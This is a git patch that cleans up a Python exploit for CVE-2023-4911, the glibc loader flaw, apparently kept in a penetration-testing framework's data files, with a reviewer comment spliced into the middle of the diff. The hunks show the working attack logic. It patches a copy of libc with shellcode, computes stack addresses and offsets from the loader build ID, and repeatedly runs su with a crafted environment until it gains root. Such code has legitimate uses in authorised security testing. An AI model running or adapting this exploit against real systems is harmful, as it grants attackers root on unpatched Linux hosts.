From 2ed3b771edd55f94710682be2debde2f4a55bf74 Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Tue, 19 Dec 2023 00:26:54 -0500
Subject: [PATCH] Updated python exploit

---
 data/exploits/CVE-2023-4911/cve_2023_4911.py | 25 ++++----------------
 1 file changed, 4 insertions(+), 21 deletions(-)

diff --git a/data/exploits/CVE-2023-4911/cve_2023_4911.py b/data/exploits/CVE-2023-4911/cve_2023_4911.py
index 8a1737ddec..0148a6266e 100644
--- a/data/exploits/CVE-2023-4911/cve_2023_4911.py
+++ b/data/exploits/CVE-2023-4911/cve_2023_4911.py
@@ -57,6 +57,7 @@ TARGETS = {
     },
 }
 
+# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
 BUILD_IDS = {
     "69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
     "3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
@@ -96,7 +97,7 @@ def parse_structured_data(structure_format, structure_keys, structure_data):
     return parsed_structure
 
 
-def fetch_library_path(library_name):
+def fetch_c_library_path():
     class LoadedLibrary(Structure):
         _fields_ = [("l_addr", c_void_p), ("l_name", c_char_p)]
@@ -267,18 +268,14 @@ if __name__ == "__main__":
     architecture = os.uname().machine
     if architecture not in TARGETS.keys():
-        error_and_exit("This target's architecturs '%s' is not supported by this exploit" % architecture)
-
-    c_library_path = fetch_library_path("c")
-
-    #print("Found libc = %s" % c_library_path.decode())
+        error_and_exit("This target's architecture '%s' is not supported by this exploit" % architecture)
+    c_library_path = fetch_c_library_path()
     su_binary_path = which("su")
     memory_alignment = ((0x100 - (len(su_binary_path) + 1 + 8)) & 7) + 8
     su_binary_elf = DelayedElfParser(su_binary_path)
     dynamic_linker_path = su_binary_elf.extract_section_by_name(".interp").strip(b"\x00").decode('utf-8')
-    #print("Dynamic linker path: ", dynamic_linker_path)
     dynamic_linker_elf = DelayedElfParser(dynamic_linker_path)
     dynamic_linker_build_id = binascii.hexlify(
         dynamic_linker_elf.extract_section_by_name(GNU_BUILD_ID)[-20:]).decode()
@@ -292,18 +289,12 @@ if __name__ == "__main__":
     if libc_start_main == None:
         error_and_exit("The symbol in the libc ELF '__libc_start_main' could not be resolved.")
-    #print("__libc_start_main = 0x%x" % libc_start_main)
-
     su_binary_offset = su_binary_elf.extract_section_header_by_name(".dynstr")["offset"]
     potential_path = find_path_before_null_character(su_binary_elf.data, su_binary_offset)
     if potential_path is None:
         error_and_exit("The potential path in the su_binary could not be found.")
-    #print("The potential path in the su binary was found.")
-    #print("Using path %s", potential_path["path"])
-    #print("At offset %d", potential_path["offset"])
-
     if not os.path.exists(potential_path["path"]):
         os.mkdir(potential_path["path"])
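Review bot: The new line `c_library_path = fetch_c_library_path()` is assigned but, within the visible hunks, nothing reads it any more: its only visible consumer was the deleted `#print("Found libc = %s" % c_library_path.decode())`. If the `libc_elf` setup outside this hunk does not take `c_library_path`, the assignment is dead and should either be removed or its result passed on explicitly so the rename is not carrying an unused value. The untouched context line `if architecture not in TARGETS.keys():` could become `if architecture not in TARGETS:` in the same spirit of cleanup. The enclosing `if __name__ == "__main__":` block starts and ends outside the hunk.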
@@ -311,7 +302,6 @@ if __name__ == "__main__":
         file_handle.write(libc_elf.data[0:libc_start_main])
         file_handle.write(TARGETS[architecture]["shellcode"])
         file_handle.write(libc_elf.data[libc_start_main + len(TARGETS[architecture]["shellcode"]):])
-    #print("Patched up libc.so.6")
     stack_address = TARGETS[architecture]["stack_top"] - (1 << (TARGETS[architecture]["stack_aslr_bits"]))
@@ -321,18 +311,11 @@ if __name__ == "__main__":
         if (stack_address >> (i * 8)) & 0xFF == 0:
             stack_address |= 0x10 << (i * 8)
-    #print("The stack address being used is: 0x%x" % stack_address)
-
     environment = create_environment(BUILD_IDS[dynamic_linker_build_id], stack_address, potential_path["offset"], su_binary_elf.architecture)
     count = 1
-    #print('Entering the true loop')
     argv = [b"su", b"--help", None]
     while True:
-        #if count % 0x10 == 0:
-        #    sys.stdout.write(".")
-        #    sys.stdout.flush()
         if execute_and_monitor(su_binary_path.encode(), argv, environment) == "Success":
-            #print("After %d tries: booya" % count)
             exit(0)
         count += 1